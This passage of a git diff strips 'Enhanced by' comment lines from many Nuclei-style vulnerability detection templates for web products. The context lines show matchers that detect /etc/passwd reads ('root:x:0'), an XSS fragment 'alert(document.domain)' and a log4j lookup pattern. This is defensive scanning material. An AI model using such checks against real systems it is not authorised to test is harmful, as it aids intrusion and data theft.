+38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/pbootcms-database-file-download.yaml b/http/vulnerabilities/other/pbootcms-database-file-download.yaml index 0c85d95232..521a53237a 100644 --- a/http/vulnerabilities/other/pbootcms-database-file-download.yaml +++ b/http/vulnerabilities/other/pbootcms-database-file-download.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml index dc2a7e9d71..4a20976751 100644 --- a/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml +++ b/http/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml @@ -31,4 +31,4 @@ http: - "root:.*:0:0:" part: body -# Enhanced by md on 2022/10/05 + diff --git a/http/vulnerabilities/other/php-timeclock-xss.yaml b/http/vulnerabilities/other/php-timeclock-xss.yaml index 71fee06302..1395715981 100644 --- a/http/vulnerabilities/other/php-timeclock-xss.yaml +++ b/http/vulnerabilities/other/php-timeclock-xss.yaml @@ -37,4 +37,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml b/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml index 77461cfe42..3fbf7e5677 100644 --- a/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml +++ b/http/vulnerabilities/other/php-zerodium-backdoor-rce.yaml @@ -32,4 +32,4 @@ http: words: - "int(77777355556)" -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/phpok-sqli.yaml b/http/vulnerabilities/other/phpok-sqli.yaml index b9884bad29..ff80fc831d 100644 --- a/http/vulnerabilities/other/phpok-sqli.yaml +++ b/http/vulnerabilities/other/phpok-sqli.yaml @@ -32,4 +32,4 @@ http: words: - '{{md5({{num}})}}' -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/other/phpwiki-lfi.yaml b/http/vulnerabilities/other/phpwiki-lfi.yaml index e503aa07ef..0e1eba6ea6 100644 --- a/http/vulnerabilities/other/phpwiki-lfi.yaml +++ b/http/vulnerabilities/other/phpwiki-lfi.yaml @@ -27,4 +27,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/pmb-directory-traversal.yaml b/http/vulnerabilities/other/pmb-directory-traversal.yaml index 5450346d21..c9cf73a990 100644 --- a/http/vulnerabilities/other/pmb-directory-traversal.yaml +++ b/http/vulnerabilities/other/pmb-directory-traversal.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/pmb-local-file-disclosure.yaml b/http/vulnerabilities/other/pmb-local-file-disclosure.yaml index 5b36f03c72..1a14aacf4f 100644 --- a/http/vulnerabilities/other/pmb-local-file-disclosure.yaml +++ b/http/vulnerabilities/other/pmb-local-file-disclosure.yaml @@ -29,4 +29,4 @@ http: words: - "root:x:0" -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/pollbot-redirect.yaml b/http/vulnerabilities/other/pollbot-redirect.yaml index 7a20a57ba3..3bdc8e7a37 100644 --- a/http/vulnerabilities/other/pollbot-redirect.yaml +++ b/http/vulnerabilities/other/pollbot-redirect.yaml @@ -32,4 +32,4 @@ http: status: - 301 -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/other/powercreator-cms-rce.yaml b/http/vulnerabilities/other/powercreator-cms-rce.yaml index b1ab031c2c..f05c09ec87 100644 --- a/http/vulnerabilities/other/powercreator-cms-rce.yaml +++ b/http/vulnerabilities/other/powercreator-cms-rce.yaml @@ -49,4 +49,4 @@ http: dsl: - "contains(body_2, '{{randstr}}') && status_code_2 == 200" -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/processmaker-lfi.yaml b/http/vulnerabilities/other/processmaker-lfi.yaml index ed5d69dc4a..e27165b161 100644 --- a/http/vulnerabilities/other/processmaker-lfi.yaml +++ b/http/vulnerabilities/other/processmaker-lfi.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/qcubed-xss.yaml b/http/vulnerabilities/other/qcubed-xss.yaml index 5e935ef373..8788866032 100644 --- a/http/vulnerabilities/other/qcubed-xss.yaml +++ b/http/vulnerabilities/other/qcubed-xss.yaml @@ -38,4 +38,4 @@ http: words: - text/html -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml b/http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml index b1b9462078..9e04579bdc 100644 --- a/http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml +++ b/http/vulnerabilities/other/qi-anxin-netkang-next-generation-firewall-rce.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/qihang-media-disclosure.yaml b/http/vulnerabilities/other/qihang-media-disclosure.yaml index d7b3c7ad3a..ce7e0f25ed 100644 --- a/http/vulnerabilities/other/qihang-media-disclosure.yaml +++ b/http/vulnerabilities/other/qihang-media-disclosure.yaml @@ -31,4 +31,4 @@ http: - "password=" condition: and -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/qihang-media-lfi.yaml b/http/vulnerabilities/other/qihang-media-lfi.yaml index 4c61d46e67..18af588f46 100644 --- a/http/vulnerabilities/other/qihang-media-lfi.yaml +++ b/http/vulnerabilities/other/qihang-media-lfi.yaml @@ -42,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/04/20 + diff --git a/http/vulnerabilities/other/rconfig-file-upload.yaml b/http/vulnerabilities/other/rconfig-file-upload.yaml index 207517a711..bffe29cbe6 100644 --- a/http/vulnerabilities/other/rconfig-file-upload.yaml +++ b/http/vulnerabilities/other/rconfig-file-upload.yaml @@ -66,4 +66,4 @@ http: status: - 302 -# Enhanced by md on 2022/10/05 + diff --git a/http/vulnerabilities/other/reddittop-rss-xss.yaml b/http/vulnerabilities/other/reddittop-rss-xss.yaml index 897e1b43ff..eb969b6333 100644 --- a/http/vulnerabilities/other/reddittop-rss-xss.yaml +++ b/http/vulnerabilities/other/reddittop-rss-xss.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/rockmongo-xss.yaml b/http/vulnerabilities/other/rockmongo-xss.yaml index 5a11001c47..f85dd300aa 100644 --- a/http/vulnerabilities/other/rockmongo-xss.yaml +++ b/http/vulnerabilities/other/rockmongo-xss.yaml @@ -40,4 +40,4 @@ http: - 'Content-Type: text/html' part: header -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/sap-redirect.yaml b/http/vulnerabilities/other/sap-redirect.yaml index 3980de8e08..640348ba24 100644 --- a/http/vulnerabilities/other/sap-redirect.yaml +++ b/http/vulnerabilities/other/sap-redirect.yaml @@ -33,4 +33,4 @@ http: condition: or part: header -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/other/sar2html-rce.yaml b/http/vulnerabilities/other/sar2html-rce.yaml index 16b8e40b76..fa71962b8e 100644 --- a/http/vulnerabilities/other/sar2html-rce.yaml +++ b/http/vulnerabilities/other/sar2html-rce.yaml @@ -29,4 +29,4 @@ http: words: - "http" -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/seacms-sqli.yaml b/http/vulnerabilities/other/seacms-sqli.yaml index 5bd1ee338e..773c38b1b8 100644 --- a/http/vulnerabilities/other/seacms-sqli.yaml +++ b/http/vulnerabilities/other/seacms-sqli.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/other/seowon-router-rce.yaml b/http/vulnerabilities/other/seowon-router-rce.yaml index 493e26a573..4cfcbbe017 100644 --- a/http/vulnerabilities/other/seowon-router-rce.yaml +++ b/http/vulnerabilities/other/seowon-router-rce.yaml @@ -38,4 +38,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/sick-beard-xss.yaml b/http/vulnerabilities/other/sick-beard-xss.yaml index f6afaeeb3b..346f95b4f5 100644 --- a/http/vulnerabilities/other/sick-beard-xss.yaml +++ b/http/vulnerabilities/other/sick-beard-xss.yaml @@ -35,4 +35,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/siteminder-dom-xss.yaml b/http/vulnerabilities/other/siteminder-dom-xss.yaml index 7b1488414a..1324fe658f 100644 --- a/http/vulnerabilities/other/siteminder-dom-xss.yaml +++ b/http/vulnerabilities/other/siteminder-dom-xss.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/sl-studio-lfi.yaml b/http/vulnerabilities/other/sl-studio-lfi.yaml index e1f91fdb05..95db50771f 100644 --- a/http/vulnerabilities/other/sl-studio-lfi.yaml +++ b/http/vulnerabilities/other/sl-studio-lfi.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml b/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml index 1b0ccda2c7..1cf49afe06 100644 --- a/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml +++ b/http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml @@ -31,4 +31,4 @@ http: - "extensions" condition: and -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/solar-log-authbypass.yaml b/http/vulnerabilities/other/solar-log-authbypass.yaml index 66c152f3bb..848a6b7beb 100644 --- a/http/vulnerabilities/other/solar-log-authbypass.yaml +++ b/http/vulnerabilities/other/solar-log-authbypass.yaml @@ -37,4 +37,4 @@ http: - "mailto:info@solar-log.com" condition: and -# Enhanced by mp on 2022/04/12 + diff --git a/http/vulnerabilities/other/solarview-compact-xss.yaml b/http/vulnerabilities/other/solarview-compact-xss.yaml index 5805fb27d7..5ca1cbbe9a 100644 --- a/http/vulnerabilities/other/solarview-compact-xss.yaml +++ b/http/vulnerabilities/other/solarview-compact-xss.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml index 2c83afce97..01ba96830c 100644 --- a/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml +++ b/http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/other/steve-xss.yaml b/http/vulnerabilities/other/steve-xss.yaml index 1a4627abd1..62e293b467 100644 --- a/http/vulnerabilities/other/steve-xss.yaml +++ b/http/vulnerabilities/other/steve-xss.yaml @@ -42,4 +42,4 @@ http: status: - 200 -# Enhanced by md on 2022/12/13 + diff --git a/http/vulnerabilities/other/surrealtodo-lfi.yaml b/http/vulnerabilities/other/surrealtodo-lfi.yaml index bbf963ceee..dea8cfc53b 100644 --- a/http/vulnerabilities/other/surrealtodo-lfi.yaml +++ b/http/vulnerabilities/other/surrealtodo-lfi.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/symantec-messaging-gateway.yaml b/http/vulnerabilities/other/symantec-messaging-gateway.yaml index 648fae724a..a509b9cca3 100644 --- a/http/vulnerabilities/other/symantec-messaging-gateway.yaml +++ b/http/vulnerabilities/other/symantec-messaging-gateway.yaml @@ -28,4 +28,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/tamronos-rce.yaml b/http/vulnerabilities/other/tamronos-rce.yaml index 10b039dbdd..3ec448ddc5 100644 --- a/http/vulnerabilities/other/tamronos-rce.yaml +++ b/http/vulnerabilities/other/tamronos-rce.yaml @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by cs on 2022/05/13 + diff --git a/http/vulnerabilities/other/thinkific-redirect.yaml b/http/vulnerabilities/other/thinkific-redirect.yaml index 2a41b00c8f..9144983a15 100644 --- a/http/vulnerabilities/other/thinkific-redirect.yaml +++ b/http/vulnerabilities/other/thinkific-redirect.yaml @@ -31,4 +31,4 @@ http: condition: or part: body -# Enhanced by md on 2022/10/18 + diff --git a/http/vulnerabilities/other/thruk-xss.yaml b/http/vulnerabilities/other/thruk-xss.yaml index b19dbf64e7..e5c94424e3 100644 --- a/http/vulnerabilities/other/thruk-xss.yaml +++ b/http/vulnerabilities/other/thruk-xss.yaml @@ -43,4 +43,4 @@ http: status: - 500 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/tikiwiki-reflected-xss.yaml b/http/vulnerabilities/other/tikiwiki-reflected-xss.yaml index 23b5faf39f..e6c2909a77 100644 --- a/http/vulnerabilities/other/tikiwiki-reflected-xss.yaml +++ b/http/vulnerabilities/other/tikiwiki-reflected-xss.yaml @@ -36,4 +36,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/tpshop-directory-traversal.yaml b/http/vulnerabilities/other/tpshop-directory-traversal.yaml index f4b4f82b1f..f998849f2c 100644 --- a/http/vulnerabilities/other/tpshop-directory-traversal.yaml +++ b/http/vulnerabilities/other/tpshop-directory-traversal.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/turbocrm-xss.yaml b/http/vulnerabilities/other/turbocrm-xss.yaml index 8b56f76f93..0081ae28d8 100644 --- a/http/vulnerabilities/other/turbocrm-xss.yaml +++ b/http/vulnerabilities/other/turbocrm-xss.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/ueditor-file-upload.yaml b/http/vulnerabilities/other/ueditor-file-upload.yaml index 791cf4b053..dcf40aa0ab 100644 --- a/http/vulnerabilities/other/ueditor-file-upload.yaml +++ b/http/vulnerabilities/other/ueditor-file-upload.yaml @@ -30,4 +30,4 @@ http: - "没有指定抓取源" part: body -# Enhanced by md on 2022/10/31 + diff --git a/http/vulnerabilities/other/umbraco-base-ssrf.yaml b/http/vulnerabilities/other/umbraco-base-ssrf.yaml index 6ec2cf8b88..d23ca4f27f 100644 --- a/http/vulnerabilities/other/umbraco-base-ssrf.yaml +++ b/http/vulnerabilities/other/umbraco-base-ssrf.yaml @@ -39,4 +39,4 @@ http: - "len(body_2)==0" - "len(body_3)==0" -# Enhanced by cs 08/03/2022 + diff --git a/http/vulnerabilities/other/unauth-hoteldruid-panel.yaml b/http/vulnerabilities/other/unauth-hoteldruid-panel.yaml index 9046c9b6f3..d465536d36 100644 --- a/http/vulnerabilities/other/unauth-hoteldruid-panel.yaml +++ b/http/vulnerabilities/other/unauth-hoteldruid-panel.yaml @@ -36,4 +36,4 @@ http: - "TABLES:" condition: and -# Enhanced by mp on 2022/03/24 + diff --git a/http/vulnerabilities/other/unauth-spark-api.yaml b/http/vulnerabilities/other/unauth-spark-api.yaml index 034f2b42f6..66c2cde18b 100644 --- a/http/vulnerabilities/other/unauth-spark-api.yaml +++ b/http/vulnerabilities/other/unauth-spark-api.yaml @@ -32,4 +32,4 @@ http: part: body condition: and -# Enhanced by cs on 2022/02/28 + diff --git a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml index e9e8d3dc02..ddabe42069 100644 --- a/http/vulnerabilities/other/unifi-network-log4j-rce.yaml +++ b/http/vulnerabilities/other/unifi-network-log4j-rce.yaml @@ -66,4 +66,4 @@ http: regex: - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output -# Enhanced by mp on 2022/06/03 + diff --git a/http/vulnerabilities/other/vanguard-post-xss.yaml b/http/vulnerabilities/other/vanguard-post-xss.yaml index bb82213368..02fcf7f2b9 100644 --- a/http/vulnerabilities/other/vanguard-post-xss.yaml +++ b/http/vulnerabilities/other/vanguard-post-xss.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/viewlinc-crlf-injection.yaml b/http/vulnerabilities/other/viewlinc-crlf-injection.yaml index 385e74392c..f001c0fc57 100644 --- a/http/vulnerabilities/other/viewlinc-crlf-injection.yaml +++ b/http/vulnerabilities/other/viewlinc-crlf-injection.yaml @@ -32,4 +32,4 @@ http: part: header condition: and -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/vpms-auth-bypass.yaml b/http/vulnerabilities/other/vpms-auth-bypass.yaml index 0342f8fd49..ba9399afdd 100644 --- a/http/vulnerabilities/other/vpms-auth-bypass.yaml +++ b/http/vulnerabilities/other/vpms-auth-bypass.yaml @@ -40,4 +40,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/other/wapples-firewall-lfi.yaml b/http/vulnerabilities/other/wapples-firewall-lfi.yaml index 7194873bf1..ac117d5b67 100644 --- a/http/vulnerabilities/other/wapples-firewall-lfi.yaml +++ b/http/vulnerabilities/other/wapples-firewall-lfi.yaml @@ -44,4 +44,4 @@ http: regex: - "root:[x*]:0:0" -# Enhanced by mp on 2023/01/15 + diff --git a/http/vulnerabilities/other/watchguard-credentials-disclosure.yaml b/http/vulnerabilities/other/watchguard-credentials-disclosure.yaml index d683d6272b..24ad95f6e5 100644 --- a/http/vulnerabilities/other/watchguard-credentials-disclosure.yaml +++ b/http/vulnerabilities/other/watchguard-credentials-disclosure.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/03 + diff --git a/http/vulnerabilities/other/webui-rce.yaml b/http/vulnerabilities/other/webui-rce.yaml index dc9c5c2f08..93997ab5af 100644 --- a/http/vulnerabilities/other/webui-rce.yaml +++ b/http/vulnerabilities/other/webui-rce.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/03 + diff --git a/http/vulnerabilities/other/wems-manager-xss.yaml b/http/vulnerabilities/other/wems-manager-xss.yaml index 3a69b8ff37..1c5c11c83c 100644 --- a/http/vulnerabilities/other/wems-manager-xss.yaml +++ b/http/vulnerabilities/other/wems-manager-xss.yaml @@ -33,4 +33,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/wuzhicms-sqli.yaml b/http/vulnerabilities/other/wuzhicms-sqli.yaml index 2196635df4..26df29f114 100644 --- a/http/vulnerabilities/other/wuzhicms-sqli.yaml +++ b/http/vulnerabilities/other/wuzhicms-sqli.yaml @@ -39,4 +39,4 @@ http: status: - 200 -# Enhanced by md on 2022/12/13 + diff --git a/http/vulnerabilities/other/xdcms-sqli.yaml b/http/vulnerabilities/other/xdcms-sqli.yaml index 75e797d8f7..0b1267c4bc 100644 --- a/http/vulnerabilities/other/xdcms-sqli.yaml +++ b/http/vulnerabilities/other/xdcms-sqli.yaml @@ -44,4 +44,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/other/xerox-efi-lfi.yaml b/http/vulnerabilities/other/xerox-efi-lfi.yaml index f12468ba63..03f4168648 100644 --- a/http/vulnerabilities/other/xerox-efi-lfi.yaml +++ b/http/vulnerabilities/other/xerox-efi-lfi.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/yapi-rce.yaml b/http/vulnerabilities/other/yapi-rce.yaml index 5db09b88ae..10a409433c 100644 --- a/http/vulnerabilities/other/yapi-rce.yaml +++ b/http/vulnerabilities/other/yapi-rce.yaml @@ -98,4 +98,4 @@ http: status: - 200 -# Enhanced by mp on 2022/06/03 + diff --git a/http/vulnerabilities/other/yarn-resourcemanager-rce.yaml b/http/vulnerabilities/other/yarn-resourcemanager-rce.yaml index 4ecb03c11a..9008b0954e 100644 --- a/http/vulnerabilities/other/yarn-resourcemanager-rce.yaml +++ b/http/vulnerabilities/other/yarn-resourcemanager-rce.yaml @@ -28,4 +28,4 @@ http: status: - 200 -# Enhanced by md on 2022/10/05 + diff --git a/http/vulnerabilities/other/yeswiki-sql.yaml b/http/vulnerabilities/other/yeswiki-sql.yaml index 1836d0f36b..07c511b70d 100644 --- a/http/vulnerabilities/other/yeswiki-sql.yaml +++ b/http/vulnerabilities/other/yeswiki-sql.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by md on 2022/09/28 + diff --git a/http/vulnerabilities/other/yeswiki-stored-xss.yaml b/http/vulnerabilities/other/yeswiki-stored-xss.yaml index 4327f1b5d4..16b98cf89f 100644 --- a/http/vulnerabilities/other/yeswiki-stored-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-stored-xss.yaml @@ -69,4 +69,4 @@ http: - contains(body_2, '>') condition: and -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/yeswiki-xss.yaml b/http/vulnerabilities/other/yeswiki-xss.yaml index 5e7118f74a..b6742bf55e 100644 --- a/http/vulnerabilities/other/yeswiki-xss.yaml +++ b/http/vulnerabilities/other/yeswiki-xss.yaml @@ -41,4 +41,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/other/yishaadmin-lfi.yaml b/http/vulnerabilities/other/yishaadmin-lfi.yaml index 611d7ffa9f..1d123f3cb6 100644 --- a/http/vulnerabilities/other/yishaadmin-lfi.yaml +++ b/http/vulnerabilities/other/yishaadmin-lfi.yaml @@ -32,4 +32,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/other/zcms-v3-sqli.yaml b/http/vulnerabilities/other/zcms-v3-sqli.yaml index 65dc377128..21772c91e5 100644 --- a/http/vulnerabilities/other/zcms-v3-sqli.yaml +++ b/http/vulnerabilities/other/zcms-v3-sqli.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/other/zimbra-preauth-ssrf.yaml b/http/vulnerabilities/other/zimbra-preauth-ssrf.yaml index 1fad6022fa..e349b78512 100644 --- a/http/vulnerabilities/other/zimbra-preauth-ssrf.yaml +++ b/http/vulnerabilities/other/zimbra-preauth-ssrf.yaml @@ -31,4 +31,4 @@ http: words: - "http" -# Enhanced by mp on 2022/06/03 + diff --git a/http/vulnerabilities/other/zms-auth-bypass.yaml b/http/vulnerabilities/other/zms-auth-bypass.yaml index 9fc6c4436e..5c78ed9726 100644 --- a/http/vulnerabilities/other/zms-auth-bypass.yaml +++ b/http/vulnerabilities/other/zms-auth-bypass.yaml @@ -43,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/other/zms-sqli.yaml b/http/vulnerabilities/other/zms-sqli.yaml index 53d2a26f60..4255de7cbe 100644 --- a/http/vulnerabilities/other/zms-sqli.yaml +++ b/http/vulnerabilities/other/zms-sqli.yaml @@ -43,4 +43,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/28 + diff --git a/http/vulnerabilities/other/zzcms-xss.yaml b/http/vulnerabilities/other/zzcms-xss.yaml index 0310f0dffd..a123bf80e0 100644 --- a/http/vulnerabilities/other/zzcms-xss.yaml +++ b/http/vulnerabilities/other/zzcms-xss.yaml @@ -39,4 +39,4 @@ http: - 'contains(body_2, "参数 1\"+alert(document.domain)+")' condition: and -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/portainer-init-deploy.yaml b/http/vulnerabilities/portainer-init-deploy.yaml index 09a7fba22b..44a6a988be 100644 --- a/http/vulnerabilities/portainer-init-deploy.yaml +++ b/http/vulnerabilities/portainer-init-deploy.yaml @@ -37,4 +37,4 @@ http: status: - 404 -# Enhanced by mp on 2022/07/15 + diff --git a/http/vulnerabilities/rails/rails6-xss.yaml b/http/vulnerabilities/rails/rails6-xss.yaml index 536ef1b17f..db7dded862 100644 --- a/http/vulnerabilities/rails/rails6-xss.yaml +++ b/http/vulnerabilities/rails/rails6-xss.yaml @@ -38,4 +38,4 @@ http: part: header condition: and -# Enhanced by cs 09/23/2022 + diff --git a/http/vulnerabilities/rocketchat/unauth-message-read.yaml b/http/vulnerabilities/rocketchat/unauth-message-read.yaml index 2832e307ff..07f297824b 100644 --- a/http/vulnerabilities/rocketchat/unauth-message-read.yaml +++ b/http/vulnerabilities/rocketchat/unauth-message-read.yaml @@ -50,4 +50,3 @@ http: status: - 200 -# Enhanced by mp on 2022/06/03 \ No newline at end of file diff --git a/http/vulnerabilities/royalevent/royalevent-management-xss.yaml b/http/vulnerabilities/royalevent/royalevent-management-xss.yaml index 5113ab76d2..dee10cb1f8 100644 --- a/http/vulnerabilities/royalevent/royalevent-management-xss.yaml +++ b/http/vulnerabilities/royalevent/royalevent-management-xss.yaml @@ -76,4 +76,4 @@ http: status: - 200 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/royalevent/royalevent-stored-xss.yaml b/http/vulnerabilities/royalevent/royalevent-stored-xss.yaml index 6d4197b87a..921a0aad7a 100644 --- a/http/vulnerabilities/royalevent/royalevent-stored-xss.yaml +++ b/http/vulnerabilities/royalevent/royalevent-stored-xss.yaml @@ -36,4 +36,4 @@ http: status: - 302 -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/ruijie-eg-login-rce.yaml b/http/vulnerabilities/ruijie-eg-login-rce.yaml index a7fc7d9366..0d2164759a 100644 --- a/http/vulnerabilities/ruijie-eg-login-rce.yaml +++ b/http/vulnerabilities/ruijie-eg-login-rce.yaml @@ -50,4 +50,4 @@ http: regex: - 'admin ([a-zA-Z0-9#@]+)",' -# Enhanced by cs 03/02/2023 + diff --git a/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml b/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml index 483084292b..ef44fc8b7e 100644 --- a/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml +++ b/http/vulnerabilities/ruijie/ruijie-eg-rce.yaml @@ -60,4 +60,4 @@ http: regex: - 'admin ([a-zA-Z0-9#@]+)",' -# Enhanced by mp on 2022/06/03 + diff --git a/http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml b/http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml index 420d221568..41de3ef327 100644 --- a/http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml +++ b/http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml @@ -37,4 +37,4 @@ http: status: - 200 -# Enhanced by mp on 2022/08/04 + diff --git a/http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml b/http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml index 177c35d994..03fb2cbe57 100644 --- a/http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml +++ b/http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml @@ -31,4 +31,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/31 + diff --git a/http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml b/http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml index d143df207b..c1fd675554 100644 --- a/http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml +++ b/http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml @@ -33,4 +33,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/31 + diff --git a/http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml b/http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml index e9242b125f..f5213b1dd1 100644 --- a/http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml +++ b/http/vulnerabilities/samsung/samsung-wlan-ap-xss.yaml @@ -36,4 +36,4 @@ http: - "text/html" part: header -# Enhanced by mp on 2022/09/23 + diff --git a/http/vulnerabilities/sangfor/sangfor-ba-rce.yaml b/http/vulnerabilities/sangfor/sangfor-ba-rce.yaml index 3e5d307fad..66927a1900 100644 --- a/http/vulnerabilities/sangfor/sangfor-ba-rce.yaml +++ b/http/vulnerabilities/sangfor/sangfor-ba-rce.yaml @@ -34,4 +34,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/30 + diff --git a/http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml b/http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml index e3fc23989d..53c07e2917 100644 --- a/http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml +++ b/http/vulnerabilities/sangfor/sangfor-edr-auth-bypass.yaml @@ -42,4 +42,4 @@ http: status: - 302 -# Enhanced by md on 2022/10/19 + diff --git a/http/vulnerabilities/sangfor/sangfor-edr-rce.yaml b/http/vulnerabilities/sangfor/sangfor-edr-rce.yaml index c51500b87d..46cce31793 100644 --- a/http/vulnerabilities/sangfor/sangfor-edr-rce.yaml +++ b/http/vulnerabilities/sangfor/sangfor-edr-rce.yaml @@ -36,4 +36,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/31 + diff --git a/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml b/http/vulnerabilities/seeyon/wooyun-2015-148227.yaml index f88ee5aad9..07e0ae222f 100644 --- 